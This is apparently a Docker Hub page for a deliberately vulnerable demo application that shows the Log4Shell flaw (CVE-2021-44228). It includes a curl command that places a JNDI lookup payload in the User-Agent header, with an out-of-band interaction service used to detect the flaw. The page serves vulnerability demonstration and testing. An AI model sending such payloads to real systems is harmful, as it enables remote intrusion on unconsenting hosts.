Quick demo application to show log4shell vulnerability (CVE-2021-44228)
10K+
Quick demo application to show log4shell vulnerability (CVE-2021-44228) in action
https://github.com/korteke/log4shell-demo
Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. interactsh-service:
curl -A '${jndi:ldap://interactsh-url/a}' http://container-ip:8080/
One should see DNS interaction e.g. at app.interactsh.com.
Content type
Image
Digest
Size
254.4 MB
Last updated
almost 5 years ago
docker pull korteke/log4shell-demo